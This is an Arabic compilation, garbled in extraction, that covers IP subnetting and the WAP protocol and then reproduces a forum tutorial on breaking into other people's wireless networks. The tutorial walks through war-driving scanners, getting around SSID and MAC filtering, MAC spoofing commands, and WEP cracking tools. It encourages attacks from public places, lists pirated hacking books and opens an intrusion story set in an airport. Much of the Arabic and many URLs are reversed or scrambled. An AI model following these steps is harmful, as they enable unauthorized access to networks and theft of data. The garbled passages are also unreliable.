تحجز ھذه . ال يمكن لمعرفات الشبكة والمحطات أن تأخذ جمیعا القیمة صفر-3 القیمة كعنوان للشبكة ذاتھا

. يجب أن يكون عنوان المحطة وحیدا بالنسبة لعنوان الشبكة-4

Network IDنسب معرفات الشبكة موجودة الIP/TCPالمحطة المستخدمة لبروتوكوالت " معرف الشبكة"يحدد

يجب على جمیع المحطات المرتبطة على . على نفس الشبكة الفیزيائیةالشبكة حتى تستطیع ) معرف(شبكة فیزيائیة واحدة أن تأخذ نفس عنوان

.االتصال مع بعضھاكما يجب أن تأخذ جمیع المحطات بما فیھا بوابات المسیرات معرفات مختلفة

.عن بعضھا IPلمربوطة إلى الشبكة ھو نفسه عنوان لبوابة المسیر اIPيكون عنوان

151

لدى أي محطة عمل عندما يتم default gatewayالمعرف كعبارة افتراضیة فیمكننا مثال تحديد للحاسب الموجود على الشبكة . لديھاIP/TCPإعداد

1Subnet 124.0.0.1 عنوان العبارة االفتراضیة 124.0.0.27 ذو العنوان.

طات المعرفات المقبولة للمحبین الجدول التالي المجاالت المقبولة لمعرفات المحطات بالنسبة ألي شبكة

:خاصة

مقترحات حول تعیین معرفات المحطاتالجزء الخاص برقم (ال توجد قواعد خاصة بالنسبة لتعیین معرفات المحطات

فیمكن مثال تعیین المعرفات بشكل متتالي أو بشكل ). IPالمحطة ضمن عنوان :فمثال. حفظهيسھل

تقسیم معرفات المحطات إلى مجموعات حسب نوع الحاسب أو المخدم-1 تحديد المسیرات حسب عناوينھم-2

Subnet Maskمفھوم قناع الشبكة الجزئیة لتحقیق ما ) IPمثله مثل عنوان ( بت 32يستخدم قناع الشبكة المؤلف من

:يلي الشبكة وبین معرف المحطة للتمییز بین معرف IP حجز قسم من عنوان -1 للمحطة الوجھة يقع على الشبكة المحلیة أو IP التعبیر عن كون عنوان -2

.على شبكة بعیدةيمكن أن . IP/TCPيجب تعیین قناع شبكة لكل محطة مستخدمة لبروتوكوالت

يأخذ ھذا القناع القیمة االفتراضیة عندما ال تكون الشبكة مجزأة إلى شبكات .یمة معرفة من قبل المستثمر في حال وجود الشبكات الجزئیةجزئیة أو أي ق

قناع الشبكة الجزئیة االفتراضي غیر المجزأة إلى IP/TCPيستخدم قناع الشبكة االفتراضي في شبكات

يجب تعريف قناع الشبكة لدى جمیع المحطات الموجودة على . شبكات جزئیة .كةھذا ويتعلق القناع االفتراضي بصف الشب. الشبكة

أي أن القیمة العشرية " 1"تأخذ جمیع البتات الموافقة لمعرف الشبكة القیمة بینما تأخذ البتات الموافقة لمعرف ". 255"لكل بايت تكون مساوية للقیمة

".0"المحطة القیمة

طريقة تحديد وجھة طرد ماعلى (للتفرقة بین الطرود الموجھة إلى محطة محلیة ” AND“يتم استخدام

152

.أو إلى محطة بعیدة) الشبكة الفیزيائیةنفس للمحطة وبین قناع IPبین عنوان ” AND“، تتم عملیة IP/TCP عند إعداد -1

.الشبكة المعرف لھا للوجھة وبین قناع IPبین عنوان ” AND“ قبل إرسال أي طرد تتم عملیة -2

. الشبكة المحليفھذا يعني أن الطرد موجه ) 2(مع نتائج المرحلة ) 1(إذا تساوت نتائج المرحلة

الطرد موجه (إلى محطة محلیة وإال فیتم إرسال الطرد إلى العبارة االفتراضیة ).إلى محطة بعیدة

مع البت المقابل في قناع IPبمقارنة كل بت من عنوان ” AND“تتم عملیة ".0"وإال فالنتیجة تكون " 1"فتكون النتیجة " 1"فإذا أخذ البتان القیمة . الشبكة

...انتھـــــــى

153

)WAP(بروتوكول االستخدام الالسلكي

بروتوكول االستخدام الالسلكيWireless application protocol

)WAP(

ال تستبعد إذا قلنا لك بأن بإمكانك أن تحجز تذكرتك أو أن ترى فیلم فیديو أو و ترسل تتعرف على آخر األخبار وتري تطورات السوق وتشتري وتبیع أسھمك أكل ھذا ...وتستقبل رسائل الكترونیة وغیرھا من األمور المختلفة على اإلنترنت

نعم إن ذلك قد أصبح حقیقة إلى حد كبیر . وأنت تسیر متمشیا في الشارعإذا كان محتويا على برنامج " الموبايل" وذلك باستخدام التلفون المحمول

".واب"ومنذ . ، واآلن ال يكاد أحد لم يسمع به بدأنا نسمع به منذ أشھر قلیلةWAPواب

أن بدأ استخدامه كبرنامج داخل التلفون النقال، فقد أصبح وكأن لديك كمبیوتر .داخل جیبك

ملیون أوربي سیكون 270يعتقد المحللون بإنه بعد أقل من خمس سنوات فإن من ھؤالء سیستعملون التلفونات % 70لديھم تلفونات نقالة، وأن حوالي

بل يعتقد الباحثون بأنه ما أن . للوصول إلى اإلنترنتWAPمدة على خدمة المعت حتى يكون الناس الذين يمتلكون تلفونات نقالة متالئمة مع 2003نصل لسنة

ھم أكثر عددا من الذين يمتلكون أجھزة WAP compatible phonesالواب !.كمبیوتر

؟WAPإذن ما ھو الواب WAP أو on protocolWireless applicati عبارة عن بیئة استخدام ومجموعة

قواعد اتصال خاصة بأجھزة االتصال الالسلكیة، تم تصمیمھا بمواصفات معیارية من أجل توحید أسلوب عمل معدات االتصال مثل التلفون النقال واألجھزة

المرسلة والمستقبلة من حیث إمكانیتھا الوصول إلى اإلنترنت بما في ذلك كتروني والشبكة العنكبوتیة ومجموعات األخبار وخدمات المعلومات البريد اإلل

المختلفة ووسائل التسلیة والثقافة وأعمال البنوك واألسھم والتجارة والشراء .عبر اإلنترنت ومعرفة األحوال الجوية وغیرھا

154

Wireless application protocol ،تعني بروتوكول االستخدام الالسلكيوجیا المعلومات فإن كلمة بروتوكول عبارة عن مجموعة قواعد وبالنسبة لتكنول

ونظم خاصة تحكم عملیة التفاھم بین نقاط االتصال النھائیة الموجودة على شبكة االتصاالت، وذلك عندما تقوم تلك النقاط بإرسال واستقبال اإلشارات فیما

والعادة أن . إن كل نقطة نھائیة يجب أن تتعرف على وتراقب تلك القواعد. بینھا .تكون تلك القواعد معیارية في المجال الذي تعمل به

وقد أصبح ھذا البروتوكول اآلن ھو المعیار القیاسي الذي يعمل على أساسه

Mobileصانعي أنظمة االتصال الالسلكیة المستخدمة مثل التلفون النقال Phones واألجھزة الرقمیة الشخصیة المساعدة tal Personal Digi

PDAs(Assistants وراديو السیارات Car Radios وأجھزة البحث الالسلكیة وغیرھا من األجھزة األخرى والتي ھي اآلن في Navigation Systemsاألخرى

.مراحل التطوير

إن المواصفات المعیارية لھذا النظام ھي مواصفات دولیة، ومفتوحة بشكل تكون ورين ومستخدمین، وذلك من أجل إعطاء فیه متاحه للجمیع من صانعین ومط

مستخدمي أجھزة التلفون النقال إمكانیات أكبر وأقوى للتعامل مع الخدمات كما أضاف ھذا البروتوكول لإلنترنت إمكانیة الحركة . والمعلومات بشكل فوري

واإلنتشار األوسع، ويتم العمل على أن يجعل مالكي ھذا النظام الوصول . أسھل وأفضلوالبحث في اإلنترنت

ومع أن الوصول لإلنترنت بھذه األجھزة كان ممكننا في الماضي، حیث كان لكل من المصنعین تقنیته الخاصة به، إال أنه في المستقبل فإن المعدات المختلفة

سیكون بإمكانھا التفاھم مع بعضھا والتعامل مع WAPالصنع، والتي تستعمل اإلنترنت

مجلس مجموعة الواب

ForumWAP

ونوكیا Ericssonأوجد ھذا البروتوكول مجموعة من الشركات ھي إيريكسون Nokia وموتوروال Motorola باإلضافة إلى شركة برامج أقل شھرة ھي أنوايرد

. com.Phone، والتي أسمت نفسھا بعد ذلك بإسم Unwired Planetبالنیت ي بمجلس ، حیث تكون من أجل ذلك ما إسم1997وقد تم ذلك في صیف

وكان الغرض ) org.wapforum.www(The WAP forumمجموعة الواب

155

األساسي منه ھو من أجل تحديد إيجاد قوة ضغط تستطیع وضع مواصفات عامة لھذه الصناعة وذلك لتطوير اإلستخدامات عبر شبكات اإلتصاالت الالسلكیة، وأن

و جمع وإحضار الشركات باإلضافة إلى أن من أھدافه ھ. ال يتم إحتكار ذلك تجارياالعاملة في كافة مجاالت أعمال الصناعات الالسلكیة للتأكید على توحید

وكما في بروتوكول اإلنترنت فإن . مواصفاتھا بالتقید يقواعد ھذا البروتوكولباإلضافة . بروتوكول اإلستخدام الالسلكي يتمیز بأنه بروتوكول معیاري عالمي

واآلن فقد أصبح . كم به ال تعود ألحد أو ألية شركةإلى أن ملكیته وإمكانیة التحعدد أعضائه عدة مئات من الشركات من كافة الصناعات التي يتصل عملھا

باإلنترنت مثل مزودي الخدمة ومصممي البرامج والمنظمات التي تعطي حلوال كما أن من ضمن أعضائه من ھم . خاصة في مجال اإلتصاالت الالسلكیة

من العاملین في مجال التلفون النقال في العالم % 90 من مسئولین عن أكثر .أجمع، والذين لديھم أكثر من مئة ملیون مشترك

156

الشبكات الالسلكیة Slacker:للكاتب

:مناقشة

خلیني اوضحلك ...بس على العموم حتى الاكون اجیب الكم من دون ادلة شوف التناقض

مھمه جداا اللي غالبا ماتجد لھا حقیقه ااختراق الشبكات من المواضیع ال موضوع ايتكلم عنھا

وانا شايف الكل يبي يعرف كیف يتم اخترااق الشبكات او الشبكه سواء كانت واير او وايرلس

يعني اغلبنا يكون يستخدم كمبیوتر في جـامعه مثال ويبي يوصل لكمبیوتر اخر او كمبیوتر االدمنستور

!!!او مطااااراو في مقھى انترنت او حتى في سوق اخي العزيز في ھذا المنتدى ولیس في غیره طرح كتاب اسمه

Box .the.Own.to.How.Network.the.Stealing في احدى ...اعتقد انه عندك ..قصصه يشرح كیف انه كان جالسا في المطار وكیف اخترق شبكة السلكیة

...التنقصل سوى خبرة والطريقة واقعیة جداعلى العموم ...دة واالدوات موجودة لكن نحن مانريد نشتغل اذن الطرق موجو

...بعض النقاط اشرحھا بايجاز ...الشبكات سواء كانت سلكیة او السلكیة يجب ان تكون عنوان ممیز سواء

..لعملیات المسح IPدومین او رقم في حال الشبكة السلكیة عند اختراقك لھا يجب ان تكون عغضو فیھا ان لم

موصولة باالنترنت وفي حال كانت موصولة وقتھا التسمى شبكة تسمى تكون انترانت ھي نقطة ھاااااااامة

االن الشبكات االسلكیة سواء كنت عضو فیھا او لم تكن عضو او سواء كانت ,,,,موصولة باالنترنت او لم تكن باستطاعتك اختراقھا ید حیكون الجاھز اك ..الشبكة السلكیة لنتلكم في حال كنت عضو فیھا

يعني P 2 Pاتكلم عن الشبكات الحقیقیة ولیس Serverاالساسي الي ھو الـ بشكل فعلي ولیس شكلي تتراوح الطرق من Server / Clientالي تعتمد مبدا

السھولة حیث ان تمكنت من الجلوس علیه لفترة بامكانك زرع باكدوور او حتى وعندك ھجوم F Attacking MacOاو مايسمى Mac Floodانك تعمل ھجوم

القوة العنیفة ناسي شلون نتكتب باالنجلیزي

157

طبعا االن تتجه اغلب الشركات الى الشبكات االسلكیة وھنا مربط الفرس حیث

لھا مستقبل حتى في وطننا العربي الغاليحیث تم االن وفي مصر انشاء بعض النقاط الساخنة الي اذا وقفت علیھا تحرقك

لكي تتصل باالنترنت وانت تاكل الھامبرجرمن عند Hot Spotصال قصدي نقاط ات ماكدونالد وانت رافع العلم االمريكي ومكشر عن انیابك

او حتى وانت في الحمام عم تعمل دوش ساخن واالبتوب بین رجلیك مثال الي اذا استعملھا Voice Over IPالمھم ھذه نقاط االتصال وايضا تقنیة

وتقنیة عرضون للحبس والمخالفات المالیةالسوريین سوف يت Fi-Wiالاعرف ان كانت كلمة تقنیة جیدة

المھم كلھا تعمد على انو يكون في جھازك كرت شبكة السلكي االن بابسط االشكال لكي تخترق مثل ھذه الشبكة يجب توفر امور بديھیة

جھاز البتوب 1- كرت شبكة السلكي 2- بكة ان تكون بمجال تردد الش3- القط الشارة اختیاري4-

ديجب مراعاة عدة امور في اختراق الشبكات االسلكیة ان تاخذ ركن ماحد يشك فیك يقوموا بفكروك ارھابي بتاع تفجیرات جدة او حتى

لبنان يعني خذلك مكان ھادي استعمل برامج مثل

>/com.netstumbler.www://http<netstumbler لويندوز و Wellenreiter النظمة لینكس واخواته

ويجب علیك االنتباه الى في حال لقطت شبكة من Adminكلمة السر االفتراضیة للبشبكة تاتي عادة 1-

الممكن يكونوا مغیرينھا ومن الممكن ال ومن الممكن ماتجد كلمة سر تشفیر البیانات تتبع الشبكة االسلكیة طرق تشفیر يعني ممكن ان تتنصت 2-

ات وتعرف تردد الشبكة وكل ھذه االمور بس تصلك البیانات على المعلوم والتقنیة اسمھا علىل ماعتقد ..مشفرة

Wired Equivalent Privacy وھناك اداوت تجده فيpacketstormsecurity >/nl.packetstormsecurity://http< لكسر ھذه الترامیز فلترة العناوين4-

مات بسب Continent .a.Own.to.How.Network.the.Stealingبطل قصة كتاب MAC Addressنسیانه تزوير عناوين

158

اعتقد انه ھناك اخوة في ھذا المنتدى قد طرحوا مواضیع ووضحوا ماذا يعني MAC Address

المھم لكل كرت شبكة عنوان ممیز بوضعه الشركة المصنعة للكرت وھو عناون یا وا حتى تكرارھا وكما ھو فیزيائي ولیس ھناك مجال للتطابق االرقام نھائ

للشبكات للمزيد اقرا OSI Model معروف فان نقطة االتصال في مكونات الـ فمن ھنا من الممكن ان IP ولیس الـ MAC Addressتعامل مع الـ RFC وثائق

تحدد مجموعة المستخدمین في شبكتك وتمنع اي اتصال اخر من اي عنوان غیر محدد

MACولنفرض انت قدرت تحدد Allow some , Deny ALLتدعي ھذه الطريق بـ Address بتاع الشبكة بتزوير للباكیت المرسلة تكون كعضو موثوق

SSIDمعرف الخدمة او الـ 5- SSIDاو معرف الخدمة كل نقطة اتصال لھا Service Set Identifierاختصارا لـ ال

ه ھي انني معین ويكون معروف من جھة مستخدمي الشبكة والفائدة منولنفرض لست بمقر الشركة ولكنني ضمن نطاق مجال الشبكة موجود فیه

بامكاني عن طريق احد برمجیات الشكبات االتصال ووالتعريف عن نفسي عن SSIDطريق الـ

ياتي احیانا بشكل افتراضي وينسى مدير SSIDولكن المشكلة ان ھذا الـ طريقة اخرى للحماية وھي تقلیل الشبكة تغییرة وتكون عرضة الختراقات وھناك

نسبة االرسال او الطیف التابع للشبكة االسكلیة وبذلك باالمكان تحديدھا بحیث التتخطى حدود شركتك او منزلك

اعرف اني قد اكون مافدتك زيادة بس صدفني انا تركت االمر لقلك مثل التعلم ..يعني المعلومة ترسخ وتظل البد الذاتي اليوجد

عض الكتب التي تفیدك كثیرا في ھذا المجاااااااااااااااااااااااااااال المھم بchm .Hacks.Security.Network.-.Reilly'O pdf .edition .Second,Network.Your.Proofing.Hack.Syngress pdf .DDU.Re ference.Portable.Security.Network.Hacknotes.Hill.Mcgraw

-Wi_-_Hill-McGrawchm .Netw_Wireless_b802.11_Building_.bookHand_Fi

to .Guide.A.Defend.Detect.Drive.WarDriving.Syngresschm .DDU-2004.Apr.Security.Wireless. chm . Best Practi- Wireless Security and Privacy -Addison Wesley

-Wi.for.Projects.Hacking.Wireless.Syngresspdf .DDU-eBook.2004.Oct.Enthusiasts.Fi

chm .A.Access.Protected.Fi-Wi.Security.802.11.Real.Wesley.Addison

159

chm .2003 - Wireless Hacks -OReilly pdf.DDU-eBook.2004.Nov.Network.Terror.a.Hacking.Syngress pdf.Box.the.Own.to.How.Network.the.Stealing.-.Syngress Ow .to.How.Network.the.Stealing.Publishing.Syngress

chm.LiB-eBook.Continent.a.n

صدقني لو كنت املك اتصال سريع باالنترنت لرفعتكلم كل ھذه الكتب ولكن اذا ...اردت ذلك

وبعدين ماعندي .....يعني تقدر تحملھم مثل ھل الوقت بعد خمسین سنة مساحة

انت اطلب من الشباب واكید مايقصروا :تمصطلحا

الشبكة االسلكیة تعمل مثلھا مثل الشبكة االعتیادية لكن يمیزھا ان تعمل .بدون الكابالت على تردد ما يقاس بالھرت

..االن لتبسیط الفكرة انظر الى الراديو او الى الستاليت تالقیھا نفس الفكرة تفكیر جمیل.تصور حتى تجیك قناة واحدة يمدوا كبل من مركز البث الى بیتك

الن المستلزماااااات ا PCجھاز

على زعم بعض ORiNOCOانصحك بكرت الشبكة ..كرت شبكة السلكي الھاكر يقولون انه االفضل في التعامل مع برمجیات الھاكر المتعلقة باختراق

الشبكات االسلكي يعني بالعامیة يلقط بشكل كويس ر وغیرھا الكث : Link -D,, Ciscoھناك اختیارت اخرى امثال

..القط اشارة او بالعامي انطین ÇäØíä ÕäÚ íÏáاذا اردت عمله بنفسك راجع ھذه الوصلة

>448/wlg/view/weblog/cs/com.oreillynet.www://http< معدل خسارة االشارة المتلقطة تحدد مع dBيجب عند شرائك االنطین مراعاة

كل انطین بیاع

اكبر كان افضل dBiاالشارة فكلما كان وھي نسبة كسب dBiاالن كل ماكان الـ يعني ...

شوف الصورة االتیة لكي تفھم الفكرة

160

...االن اختبر كرت الشبكة عندك نقطة ھامة حاول عندما شرائك كرت الشبكة ان تعرف عنه المعلومات االتیة

وانا اعطیتكم افضل ...ھل بامكني ان اركب له االنطین ھل يقبل وھیك امور یة على قولة شباب الھاكر نوع

...االن الوك نعرف انه للشبكة االسلكیة عدة انماط

الشبكة المفتوحة التي اليتوفر لھا اي حماية يعني للعوام ربما تكون عن قصد 1-

وربما عن غباء HotSpotكبعض خدمات الـ الشبكة المغلقة يعني الدخول لھا محدد العضاء الشبكة الفعلیین2- يعني تاتي المعطیات فیھا WEP encryptionبكة المغلقة مع التشفیر الش3-

..مشفرة عند االرسال جمیل جدا

حبیت اضیف نقطه اخرى بالنسبه لكروت الشبكهمن شركة ثري كوم وھو مدمج مع انتن داخلي "جدا "ھناك كرت غالي الثمن

وسعره في حدود g /b/aومن مزاياه انه يدعم انواع الشبكات الالسلكیه الثالثه كان معاي واحد منه اعطاني اياه صديق عزيزي علي وھو اخي "دوالر 250ال

07 guy from لكن لما شريت الجھاز الجديد قللي فیه وايرلس بلت ان قلت ايه قام صادره علي

من وجھة نظري اشوفھا رائعه والفرق انھا ماتدعم bg 2200ونوعیة كروت انتل bاغلب الھوتسبوتس تستخدم وما اظن اننا بحاجه له aم البروتوكول القدي

" والفرق بسیط gواللي معاه قروش زياده يشتري الجھاز تبع شكرا لك اخوي سالكر على فتحك الموضوع وان شاء اهللا بنتناقش فیه ونوسعه

161

بقدر االمكان " وعجبني جدا االنتن اللي من علبة البرنجلز

على فكره حبیت استفسر عن شي "لما كنت ادخل االنترنت من بیت زمیلنا سوبر لینكس كنت كل ما ابعد عن

اهللا يكرمكم كانت االشاره تضعف ولكن كل ما قربنا كانت "صندوق الزباله االشاره تزداد مع العلم اني واقف على خط متوازي من مكان االكسس بوينت

يزيد االرسال "اهللا يكرمكم "تظن انه صندوق الزباله

:األدوات ..نكمل االن

تحتاج عند اختراقك لشبكة ما الى ادوات كلمي صحیح على ماعتقد Scan نبدا االن باالمسحات الماسحات

com.microsoft.www://http<Windows/<لمستخدمي 1- com.netstumbler.www://http<netstumbler/<وفرت لنا اداة عظیمة وقوية

صورة الداة

..تعمل والقطة عدد من الشبكات ھنا واالداة

ناتي االن الى فھم بعض الماعني والرمزر في ھذه االدة االن لناخذ ھذه ..اوال نالحظ ان الشبكات يرمز لھا برمز دائرة لونھا رمادي

المعلومة ان اللون الرمادي ھو ھو عبارة عن لقط اشارة الشبكةرة جیدة جدا اما اذا كان صفراء فیه اما اذا كان اللون برتقالي فھذا عبارة عن اشا

..تعني جیدة اما اذا كانت خضراء فھي تعني اشارة ممتازة على االغلب لن تحصل على االلون اال اذا كنت داخل نطاق الشبكة بمعدل جید

جدا اما اذا كنت خارج نطاق المكان فلن تحصل الى على اللون الرمادي اخلھا رمز القفل ھذا يعني على ان ھذه نالحظ االن بان بعض الدوائر يوجد بد

162

اشبكة مفتوحة او مغلقة راجع الدرس االولاالن اذا نظرنا الى الشريط العلوي للبرنامج نالحظ بعض التسمیات وسوف

نشرحھا تفصیلال ھنااا: MAC ھناك درس يتحدث بالتفصیل عنه ابحث عنه في ...عنوان الماك ادرس

المنتدي: SSIDيكون عبارة عن اسم او ارقام او لكل شبكة معرف بھامعرف الشبكة

حتى خلیط بینھما : Name اسم الشبكة على االغلب ياتي فارغ الاحد يھتم بتسمیة شبكته

WorkGroupباسماء او لنقل ياتي افتراضیا :Chan 1-14عدد القنوات التي تعمل علیھا الشبكة يتراوح بین : Speed السرعة العظمي للشبكة : endorV الشركة الصانعة لكروت الشبكة : Type نوع الشبكة او نمطھا,,P 2P Clinet /Server وغیرھا

تمثل نقاط اتصال APمالحظة الـ : Encryption ھل يوجد تشفیر ام ال : SNRالبث االسلكي ومقدارة

+: Signalاالشارة العظمي للشبكة : - Noiseبعد عن الشبكة وجود عوائق مادية ال معدل التشويش يرتبط بعدة امور

وغیرھا+: SNRالقمیة العظمي للبث الشبكة

: IP Addr االيبي للشبكة : Subnet قناع الشبكة org.linux.www://http<Linux/< لمستخدمي 2-

ايضا توفرة لكم ادوات بدل واحدة لكني ساقتصر على االفضل ,, >/net.kismetwireless.www://http<kismet 1 -2 >/com.google.www://http<Wellenreiter

net.kismetwireless.www://http<kismet/<االداة ناتي الى تثبیت االدة اذھب الى المواقع وحملھا

:كودgz.tar.04.01.feb-gunzip kismet# slackerz/home: /slacker @root tar.04.01.bfe-xvf kismet-tar # slackerz/home: /slacker @root

04.01.feb-cd kismet# slackerz/home: /slacker @root configure./# slackerz/home: /slacker @root make deb# slackerz/home: /slacker @root

163

االن االداة تسالك بعض االسئلة تجواب علیھا حسب نوعیة كرتك حسب

الخدمات الي ترديھا امور بديھیة :كود

make# slackerz/home: /er slack@root make install #slackerz/home: /slacker @root

ھیك بتكون خلصت من تركیب االدة

االن شوفھا وھي تعمل

طیب االن نشرح بعض البارمترات الخاصة باالداة

من الممكن انھا ماتشتغل فورا وقتھا يجب ..على النظام #االداة تشتغل وانت بتاع االداة configureعلیك تعديل الـ

اذھب الى مسار اداة واكتب :كود

conf.pico kismet# /etc/local/usr: /slacker @root

مكتوبة بالبريل com.google.www://http<Wellenreiter/ <االداة الثانیة والتحتاج الى اكثر من تشغیلھا لتظھر لك واجھةرسومیة جمیلة مقاربة من

com.netstumbler.www://http<netstumbler/<برنامج Scanخلصنا من اداوت الـ

صراحة توجد ادوات عديدة غیرھا اذكرھا بسرعة 0.9.6-WifiScanner

>gz.tar.0.9.6-WifiScanner/wireless/nl.packetstormsecurity://http< اداة صراحة لم اختبرھا الى االن سمعت من بعض اصدقائي بقوتھا ولكن ھناك

بالتعامل معھا صعوبة

164

..اعتقد اننا غطینا موضوع البحث وتقفي االثر بشكل كويس االن ناتي الى نقطة ذكرتھا في فوق اال وھي معرف الخدمة الذي ذكرت يكون

ھو عبارة ان احرف او ارقام او خلیط بینھما بمعرفتك معرف الخدمة تستطیع الدخول الى الشبكة مادمت بنطاقھا

تستخدم net.sourceforge.wepdecrypt://http<crypt wepde/ <موقع االداة ...القوامیس في عملیة الكسر

wepcrackھناك اداة ثانیةي تخرج لك ھذه الترامیز وموقعھا > /net.sourceforge.wepcrack://http< ولنظام لینكسairsnort >/com.google.www://http<

:المھاجمةwireless networks some 's go to hack'K let.O

... شجعني على االكمال Hunter -Bصراحة اخي

worse 1980وصراحة انا نزلت ھذه السلسة كرمال اخي >2144=t?php.showthread/forum/cc.a4s.www://http< عسى ان

يستفید منھا طبعا التنسونا من دعاء في ظھر الغیب عسى ان ننجح في امتحان الثانوي

ل ونطحش على المعدحاول عند الھجوم انك تحط االنتین في مكان مرتفع نسبیا عشان تخلص من

مشاكل ضعف االشارة ...خش بال صالحیات 1-

كما قلت ھناك شبكات تاتي بدون معرف خدمة وال حتى اي تقنیة تشفیر وطبعا المدراء ...تحمي بیانتھا وھذا الوضع االفتراضي لھذين الخدمتین

لنقاطصحیانین تمام لھذا االذي تم شرحمھا في Scan في ھذه الحالة التحتاج الى اكثر من اي برنامج

الجزء الثاني اال فعل خدمة الشبكات االسلكیة في ويندوز اذھب الى لوحة التحكم الى

Services بعدھا فعل wireless zero configurtion وفي لینكس

:كودciapcm/etc/cd # roamer/home:/slacker@root

opts.vi wireless# pcmcia/etc:/slacker@root

165

وعدل بعدھا شباب اكید الي عارفین بنظام لینكس فاھمین علي شو عم احكي اما الي

بحیاتو مش مركب كرت شبكة وال حتى بیعرف لینكس مش حیفھم وال حیقدر رجب لذلك انا اتبع الشرح على النظامین عشان مايصیر وال ماعرفنا وال شرحك

ش تماممقل له ..االن سیظھر لك بان النظام لقط عدد من االتصاالت ھل تريد االتصال

وسوف ترى ايقوة .. فارغین واتصل Network Keyنعم واترك معرف الخدمة والـ ...االتصال ظھرت

...اعتقد ان بالك في مزحته مع سوبر اتبع نفس الطريقة MACSpoofاالختراق عن طريق الماك ادرس 2-

MACراجع مواضیع المنتدى الستزادة حول الـ المھم في مجال يكون مدير الشبكة عنده قلیل من التفكیر ويتبع طريقة اعمل بلوك الي مجھول حیث ياخذ ارقام الماك ادرس تبع شبكته ويعطیھا الصالحیات

الي عاوزھا ويعمل بلوك الي اتصال قادم من الخارج عن طريق رقم كرت .. الشبكة

االن طريقة الدخول ھي تزيیف ھذا الرقم فائدة اخرى للموضوع عدم معرفة من ھھھھھھھھه ...اتي الھجوم يفكروه ھجوم داخلي

ساذكر لكم بعض االدوات >/smac/net.klcconsulting.www://http<smac

bwmachak >zip.bwmachak/blackwave/org.irvineunderground.www://http<

SirMACsAlotم ويندوز ھناك اداة واحدة لنظام لینكس اال وھي ھدول لنظا>/tools/org.michiganwireless.www://http<

عنوان الماك ادرس من المستحیل تغییر النه عنوان فیزائي الشركة :مالحظة المصنعة للكرت تعطیه ياه تحت اشراف منظمة لكن ھذه البرمجیات اليھام نظام

ه تغیر التشغیل والشبكة انيطلعلك $$$مابیغالبھا شرح بعد التنصیب البرنامج حقه SMACاالداة االولى

كرت الشبكة والماك ادرس تیعه كل ماعلیك انك تبدله االداة الثانیة تعمل تحت وھي سھلة ايضا DOSمنصة

اما لنظام لینكس :كود

123456D00022 0pl eth.SirMACsAlot./# root:/slacker@root

...غیرھا برقم كرت الشبكة لديك eth 0الـ

166

: 123456 D00022 عنوان الماك ادرس..

....المھم بعد التغییر خش على الشبكة

..الھجوم على الشبكات المشفرة 3-كما ذكرت سابقا ھناك بعض الشبكات التي تتبع طريقة تشفیر في نقل

WEP( Protection Wired Equivalent(معطیاتھا عبر الھواء والتشفیر يسمى نستعمل ااالدوات التي تم ذكرھا في الدرس الثاني من السلسة اهللا يكرمك

ھیك تالقوھا متستلسة وبعد فترة ..عشان ثبتت الدروس Hunter -Bاخي ...سوف يقام التثبیت

wepcrackالمھم عندنا اداتین واحدة مشتركة لويندوز ولینكس وھي >/net.gesourcefor.wepcrack://http< والثانیة لنظام لینكسairsnort

>/com.shmoo.airsnort://http< االن ان كانت الشببكة محمیة بھذه الحماية كل ماعلیك تشغیل االدوات وبعد

..اخراج الترمزي كل ماعلیك WEPادخال الـ ------- <ادخال معرف الشبكة ------<ھو فتح اعدادات الشبكة

key

Scanانو الشبكة محمیة بھذا التشفیر عن طريق برامج الـ طیب كیف اعرف

167

... ھجوم حجب الخدمة 4- انشاء اهللا اشرحه قريبا

يعني .. كثیر hardware لماذا لنه لیس ھجوم بالبرامج او غیره يعتمد على الـ ...انت بحاجة فیه للراديو

...لنقل انه لیس حجب خدمة بل تشويش على الخدمة

:ملحق بارة عن ملحق المور اعتقدتھا في البداية بديھیةع

قناة االن 1- 14اعتقد اني ذكرت ان ھناك قنوات للشبكات االسلكیة تتراوح من b 802.11سوف نحدد الترددات بالنسبة لشبكات على مقیاس

..اوال بعض التعاريف االساسیة ..يقاس مدى الشبكات االسلكیة بمقیاس يدعي ھرتز

تشكلھا موجات البحر ..ھرتز 1الموجة كیلو ھرتز تشكلھا محطاث بث الراديو 1000الموجة التلفونات ,,ملیون ھرتز تشكلھا محطات بث التلفزيون 1000000الموجة

االسلكیة موجات ,,میجا ھرتز تشكلھا الشبكات االسلكیة 1000000000الموجة

GPS لمعتمدة على نظام الھاتف المحمول وخاصة الشبكات ا ,,المايكروويف الستااليتات GSM ,,ولیس

في البلدان االتیة b .11 802االن ناتي لنحدد مدى ھذه الشبكات من تقنیة Europa ,, Japan ,, USA

GHZ 2.412 1القناة 2 2.417القناة 3 2.422القناة 4 2.427القناة 5 2.432القناة 6 2.437القناة 7 2.442القناة 8 2.447القناة 9 2.452القناة 10 2.457القناة 11 2.462القناة 12 2.467القناة

168

13 2 .472القناة 2 48414.القناة

Story:

الیوم سوف اتكلم عن اجمل االمور في نظري اال وھو تعقب االثر واالخذ بالثار صراحة اذا تم اختراق موقعك او شبكتك او حتى جھازك ھذ ايدل على ضعف

انب الوقائي من جھتك لكم الجمیل ان تعرف ماذا فعل المخترق لكي من الجلتريه مدى ضعفه وان اختراقه لك ..يتمكن منك واالجمل انك ترد علیه ھجومه ..لم يكون االبسبب اھمال منك ولیس ضعف

على فكرة عمل الدروس كتاب لكن ان نفذتھا اريد I 7 Maاحییك اخي الماحي مالئیة وذلك بسبب العجلة في الكتابةمنك تصحیح االخطاء ال

صراحة سوف اجعل ھذا الدرس كسیناريو WarDriving الني كنت صراحة عاوز اشرح السناريوھات المحتملة بھجمات الـ

بماانه قال سوف يشرحھا ..بس قلت لنفسي اخلیھا الخي بالك Syngress.-السیناريو االول مترجم من كتاب

Box.the.Own.to.How.Network.the.Stealing. ...والثاني خیالي بحت

االول مترجم ...نبدا

في انتظار الرحلة القادمة يجب علي استعمال .اذا ھاانا ثانیة في المطارالطیران لكي اقابل صديقتي ومن كثر سفري عبر ھذه الخطوط اصبح موظف

االستقبال يعرفني وكلما راني يھز راسه مبتسما لى الطائرة مشیت من خالل ممر ضیق وعیوني تنظر من وانا في طريقي ا

خالل الزجاج الى مكان الرتاح فیه الى ان ياتي وقت لرحلتي توجھت الى نافذة ..تطل على المدرج وجلست على كرسي كان مغطى بقماش ابیض

بھدوء سحب جھازي المحمول االبتوب من الشنطة الىل االشخاص الذين على حاسوبي وكنت انظر حولي K 2 Wكان نظامي

يضیعون وقتھم اما في قراءة الصحف او شرب القھوة المضاء الوقت وكان في اسفل المدرج الذي انا جالس فیه رجل عجوز كان نائما وفمه مفتوح
